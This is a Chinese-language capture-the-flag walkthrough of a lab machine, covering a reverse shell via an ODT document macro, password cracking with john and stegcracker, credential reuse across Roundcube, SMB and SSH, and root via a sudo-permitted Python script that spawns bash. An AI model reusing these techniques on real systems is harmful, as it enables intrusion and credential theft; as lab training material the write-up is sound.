信息收集

服务探测

端口开的还挺多的

❯ sudo arp-scan -l
[sudo] password for ctf:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.132  08:00:27:71:a0:e7       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:fd:82:05       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.090 seconds (122.49 hosts/sec). 4 responded
❯ ip=192.168.60.132
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.132:22
Open 192.168.60.132:25
Open 192.168.60.132:80
Open 192.168.60.132:110
Open 192.168.60.132:139
Open 192.168.60.132:143
Open 192.168.60.132:445
Open 192.168.60.132:993
Open 192.168.60.132:995
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-02 20:40 CST
Initiating ARP Ping Scan at 20:40
Scanning 192.168.60.132 [1 port]
Completed ARP Ping Scan at 20:40, 0.15s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:40
Completed Parallel DNS resolution of 1 host. at 20:40, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:40
Scanning 192.168.60.132 [9 ports]
Discovered open port 143/tcp on 192.168.60.132
Discovered open port 22/tcp on 192.168.60.132
Discovered open port 995/tcp on 192.168.60.132
Discovered open port 139/tcp on 192.168.60.132
Discovered open port 110/tcp on 192.168.60.132
Discovered open port 25/tcp on 192.168.60.132
Discovered open port 80/tcp on 192.168.60.132
Discovered open port 993/tcp on 192.168.60.132
Discovered open port 445/tcp on 192.168.60.132
Completed SYN Stealth Scan at 20:40, 0.04s elapsed (9 total ports)
Nmap scan report for 192.168.60.132
Host is up, received arp-response (0.0016s latency).
Scanned at 2025-01-02 20:40:45 CST for 0s

PORT    STATE SERVICE      REASON
22/tcp  open  ssh          syn-ack ttl 64
25/tcp  open  smtp         syn-ack ttl 64
80/tcp  open  http         syn-ack ttl 64
110/tcp open  pop3         syn-ack ttl 64
139/tcp open  netbios-ssn  syn-ack ttl 64
143/tcp open  imap         syn-ack ttl 64
445/tcp open  microsoft-ds syn-ack ttl 64
993/tcp open  imaps        syn-ack ttl 64
995/tcp open  pop3s        syn-ack ttl 64
MAC Address: 08:00:27:71:A0:E7 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds
           Raw packets sent: 10 (424B) | Rcvd: 10 (424B)

打开web页面寻找突破口

扫一下目录

❯ gobuster dir -u http://192.168.60.132 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.132
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 317] [--> http://192.168.60.132/images/]
/uploads              (Status: 301) [Size: 318] [--> http://192.168.60.132/uploads/]
/assets               (Status: 301) [Size: 317] [--> http://192.168.60.132/assets/]
/config               (Status: 301) [Size: 317] [--> http://192.168.60.132/config/]
/views                (Status: 301) [Size: 316] [--> http://192.168.60.132/views/]
/roundcube            (Status: 301) [Size: 320] [--> http://192.168.60.132/roundcube/]
/server-status        (Status: 403) [Size: 279]
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
==============================================================

发现有一个页面需要添加域名，我编辑了hosts文件

访问http://gyhabogados.thl/work-with-us.php发现有个类似联系我们的表单页面

这里提交必须要上传附件，只能传pdf doc odt文件

只能尝试在这些规定的文件中写入反弹shell了

odt文件上传

看了其他师傅的WP只能利用odt文件，在里面写入宏脚本，打开文件自动执行

新建一个宏脚本

写入反弹shell

然后改一下Events，打开文档时执行rev宏脚本

尝试上传文件，发现电话必须8位，修改一下就可以了

用户提权

虽然shell是弹过来了，但是连上就自动中断了

尝试换了个端口，脚本改一下

❯ pwncat-cs -lp 4444
[22:17:55] Welcome to pwncat 🐈!                                                                                                       __main__.py:164
[22:18:02] received connection from 192.168.60.132:38282                                                                                    bind.py:84
[22:18:02] connection failed: channel unexpectedly closed 
❯ pwncat-cs -lp 1234
[23:26:54] Welcome to pwncat 🐈!                                                                                                       __main__.py:164[23:28:52] received connection from 192.168.60.132:44638                                                                                    bind.py:84[23:28:52] 0.0.0.0:1234: normalizing shell path                                                                                         manager.py:957[23:28:53] 192.168.60.132:44638: registered new host w/ db                                                                              manager.py:957(local) pwncat$ back
(remote) bob@TheHackersLabs-Gyhabogados:/home/bob$ ls                                                                                                 
1  credentials.7z  Desktop  Documents  Downloads  mail  Maildir  Music  Pictures  Public  scripts  Templates  Videos

压缩包爆破

发现有个压缩包，下到本地爆破一下

(local) pwncat$ download /home/bob/credentials.7z thl
/home/bob/credentials.7z ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 186/186 bytes • ? • 0:00:00[23:33:54] downloaded 186.00B in 0.16 seconds 
❯ 7z2john credentials.7z>hash
ATTENTION: the hashes might contain sensitive encrypted data. Be careful when sharing or posting these hashes
❯ john hash
Using default input encoding: UTF-8
Loaded 1 password hash (7z, 7-Zip archive encryption [SHA256 256/256 AVX2 8x AES])
Cost 1 (iteration count) is 524288 for all loaded hashes
Cost 2 (padding size) is 6 for all loaded hashes
Cost 3 (compression type) is 2 for all loaded hashes
Cost 4 (data length) is 26 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:02:02 78.62% 1/3 (ETA: 23:38:00) 0g/s 51.45p/s 51.45c/s 51.45C/s Credentials7z46..Credentials.7z7z50
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
barcelona        (credentials.7z)
1g 0:00:03:02 DONE 2/3 (2025-01-02 23:38) 0.005480g/s 58.62p/s 58.62c/s 58.62C/s samsung..benfica
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

拿到密码了barcelona，解压又拿到一个账户密码

❯ 7z x credentials.7z

7-Zip 24.08 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-08-11
 64-bit locale=en_US.UTF-8 Threads:4 OPEN_MAX:1024

Scanning the drive for archives:
1 file, 186 bytes (1 KiB)

Extracting archive: credentials.7z
--
Path = credentials.7z
Type = 7z
Physical Size = 186
Headers Size = 154
Method = LZMA2:12 7zAES
Solid = -
Blocks = 1


Enter password (will not be echoed):
Everything is Ok

Size:       22
Compressed: 186
❯ cat credentials.txt
bob:a7gyqqp6bt2!uv@2u

这个用户是登录不上ssh的

我想起上文扫目录的时候多出来一个roundcube需要用户登录

尝试登录一下

进去了，在已发送邮件中找到了另一个用户sam

此用户可以成功连接ssh

❯ ssh [email protected]
The authenticity of host '192.168.60.132 (192.168.60.132)' can't be established.
ED25519 key fingerprint is SHA256:/1wFoojXYBApFG/OVnUYsxumIf2wGVEEbaeuhBYdtQI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.132' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux TheHackersLabs-Gyhabogados 6.1.0-28-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Dec  8 18:26:08 2024 from 192.168.1.18
sam@TheHackersLabs-Gyhabogados:~$ ls -al
total 44
drwx------ 6 sam  abogados 4096 Dec  8 15:44 .
drwxr-xr-x 6 root root     4096 Dec  7 18:06 ..
lrwxrwxrwx 1 root root        9 Dec  8 15:44 .bash_history -> /dev/null
-rw-r--r-- 1 sam  sam       220 Mar 29  2024 .bash_logout
-rw-r--r-- 1 sam  sam      3526 Mar 29  2024 .bashrc
drwx------ 4 sam  sam      4096 Dec  7 17:30 .cache
drwxr-xr-x 3 sam  sam      4096 Dec  7 17:30 .config
-rw-r--r-- 1 sam  sam      5290 Jul 12  2023 .face
lrwxrwxrwx 1 sam  sam         5 Jul 12  2023 .face.icon -> .face
drwx------ 4 sam  sam      4096 Dec  7 17:30 .local
drwx------ 7 sam  sam      4096 Dec  8 15:02 Maildir
-rw-r--r-- 1 sam  sam       807 Mar 29  2024 .profile
sam@TheHackersLabs-Gyhabogados:~$ cd Maildir/
sam@TheHackersLabs-Gyhabogados:~/Maildir$ ls
cur                  dovecot.index.log       dovecot.mailbox.log  dovecot-uidvalidity           new            tmp
dovecot.index.cache  dovecot.list.index.log  dovecot-uidlist      dovecot-uidvalidity.67535838  subscriptions

SMB服务

再次进行信息收集

不断枚举，你可以发现利用这个sam用户可以连接smb服务

并且里面有个文件夹RESPALDOS_IT可以读取，IT_TOOLS没权限

❯ smbclient -N -L  //192.168.60.132 -U "sam" --password='Welcome2024!'

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        CONFIDENCIALES  Disk      Documentos Confidenciales de Clientes
        IT_TOOLS        Disk      IT Tools
        RESPALDOS_IT    Disk      Respaldos IT
        IPC$            IPC       IPC Service (Samba 4.17.12-Debian)
        sam             Disk      Home Directories
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 192.168.60.132 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
❯ smbclient -N   //192.168.60.132/RESPALDOS_IT -U "sam" --password='Welcome2024!'
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Dec  9 01:56:48 2024
  ..                                  D        0  Mon Dec  9 01:55:59 2024
  credenciales.psafe3                 N      520  Mon Dec  9 01:49:33 2024
  IMPORTANTE.txt                      N      582  Sun Dec  8 09:41:58 2024

                19480400 blocks of size 1024. 11336424 blocks available
smb: \> get credenciales.psafe3
getting file \credenciales.psafe3 of size 520 as credenciales.psafe3 (24.2 KiloBytes/sec) (average 24.2 KiloBytes/sec)
smb: \> get IMPORTANTE.txt
getting file \IMPORTANTE.txt of size 582 as IMPORTANTE.txt (51.7 KiloBytes/sec) (average 33.6 KiloBytes/sec)
smb: \>

get到本地

其中IMPORTANTE.txt有个提示

看来需要生成一个密码字典了

得到credenciales.psafe3的密码ChevyImpala1995

❯ for i in {1900..2100};do echo  ChevyImpala$i>>pass;done
❯ pwsafe2john credenciales.psafe3 >hash
❯ john hash --wordlist=pass
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ChevyImpala1995  (credencial)
1g 0:00:00:00 DONE (2025-01-03 00:02) 100.0g/s 20100p/s 20100c/s 20100C/s ChevyImpala1900..ChevyImpala2100
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

打开psafe3文件需要下载一个密码管理器

1	❯ sudo apt-get -y install passwordsafe

又得到一个新的用户dean密码为MasterOfPuppets1986

❯ ssh [email protected]
[email protected]'s password:
Linux TheHackersLabs-Gyhabogados 6.1.0-28-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Dec  8 19:12:27 2024 from 192.168.1.18
dean@TheHackersLabs-Gyhabogados:~$ ls
Maildir  user.txt
dean@TheHackersLabs-Gyhabogados:~$ cat user.txt
930b5a4b9098abfdaa67f93a937593bf

终于是拿到user了

太晚了，明天接着做吧🥱

Root提权

可以看到home目录还有一个用户没有利用

dean@TheHackersLabs-Gyhabogados:/home$ ls -al
total 24
drwxr-xr-x  6 root root     4096 Dec  7 18:06 .
drwxr-xr-x 20 root root     4096 Dec  6 14:25 ..
drwx------ 19 bob  bob      4096 Jan  2 10:16 bob
drwx------  8 dean abogados 4096 Dec  8 16:02 dean
drwx------  8 john john     4096 Dec  8 19:09 john
drwx------  6 sam  abogados 4096 Dec  8 15:44 sam

ppk文件利用

然后尝试利用dean用户登入smb服务发现有个私钥的ppk文件

❯ smbclient -N  //192.168.60.132/IT_TOOLS -U "dean" --password='MasterOfPuppets1986'
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Dec  9 01:12:50 2024
  ..                                  D        0  Mon Dec  9 01:55:59 2024
  private_key.ppk                     N     1458  Sun Dec  8 08:20:47 2024

                19480400 blocks of size 1024. 11328960 blocks available
smb: \> get private_key.ppk
getting file \private_key.ppk of size 1458 as private_key.ppk (355.9 KiloBytes/sec) (average 356.0 KiloBytes/sec)
smb: \> qui

.ppk 文件是 PuTTY Private Key 文件的扩展名，它是 PuTTY 生成和使用的私钥文件格式。PuTTY 是一个广泛用于 Windows 的 SSH 和 Telnet 客户端，而 .ppk 文件专门用于存储 PuTTY 的私钥。

所以我们需要下载一个putty-tools转为私钥文件

这样就成功登入john了

❯ sudo apt install putty-tools
❯ puttygen private_key.ppk -O private-openssh -o private_key.pem
❯ chmod 600 private_key.pem
❯ ssh [email protected] -i private_key.pem
Linux TheHackersLabs-Gyhabogados 6.1.0-28-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Dec  8 19:22:50 2024 from 192.168.1.18
john@TheHackersLabs-Gyhabogados:~$

不过在这个用户没什么可以突破的

尝试利用dean用户登入邮件系统，发现bob发了一封邮件给dean

图片隐写

里面有一张汽车的图片

猜测又是图片隐写之类的

果不其然，拿到了john的密码了

❯ stegcracker impala_67.jpg
StegCracker 2.1.0 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2025 - Luke Paris (Paradoxis)

StegCracker has been retired following the release of StegSeek, which
will blast through the rockyou.txt wordlist within 1.9 second as opposed
to StegCracker which takes ~5 hours.

StegSeek can be found at: https://github.com/RickdeJager/stegseek

No wordlist was specified, using default rockyou.txt wordlist.
Counting lines in wordlist..
Attacking file 'impala_67.jpg' with wordlist '/usr/share/wordlists/rockyou.txt'..
Successfully cracked file with password: ironmaiden
Tried 4598 passwords
Your file has been written to: impala_67.jpg.out
ironmaiden
❯ cat impala_67.jpg.out
john: TI!Powerful2024

Sudo权限

发现有sudo权限，可以执行一个备份脚本

john@TheHackersLabs-Gyhabogados:~$ sudo -l
[sudo] password for john:
Matching Defaults entries for john on TheHackersLabs-Gyhabogados:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User john may run the following commands on TheHackersLabs-Gyhabogados:
    (ALL) PASSWD: /usr/bin/python3 /home/john/tools/backup.py

然而发现tool下并没有这个脚本，那创建一个直接python提权即可

john@TheHackersLabs-Gyhabogados:~/tools$ vim backup.py
import os
os.system('bash -c "/bin/bash"')
john@TheHackersLabs-Gyhabogados:~/tools$ sudo  /usr/bin/python3 /home/john/tools/backup.py
root@TheHackersLabs-Gyhabogados:/home/john/tools# id
uid=0(root) gid=0(root) groups=0(root)
root@TheHackersLabs-Gyhabogados:/home/john/tools# cd /root
root@TheHackersLabs-Gyhabogados:~# ls
Maildir  notes.txt  vboxpostinstall.sh
root@TheHackersLabs-Gyhabogados:~# cat notes.txt
███████ ██           ██████  █████  ███    ██ ██████  ██ ██████   █████  ████████  ██████
██      ██          ██      ██   ██ ████   ██ ██   ██ ██ ██   ██ ██   ██    ██    ██    ██
█████   ██          ██      ███████ ██ ██  ██ ██   ██ ██ ██   ██ ███████    ██    ██    ██
██      ██          ██      ██   ██ ██  ██ ██ ██   ██ ██ ██   ██ ██   ██    ██    ██    ██
███████ ███████      ██████ ██   ██ ██   ████ ██████  ██ ██████  ██   ██    ██     ██████

¡Felicidades, hacker!

Has logrado rootear la máquina.

Recuerda, la ciberseguridad es un campo en constante evolución. Los desafíos son solo una pieza del rompecabezas;
sigue aprendiendo, explorando y compartiendo tu conocimiento.

Si te gustó este CTF, ¡cuéntaselo a otros! Y si encontraste errores o tienes sugerencias, no dudes en hacérmelo saber.

Flag: 63baa2b1cd7ac490cf34e7c6a317067b

"La verdadera fuerza de voluntad está en fallar una y otra vez, y al final tener éxito"
--- David Goggins

这个靶机还是很有意思的，一环扣一环的😀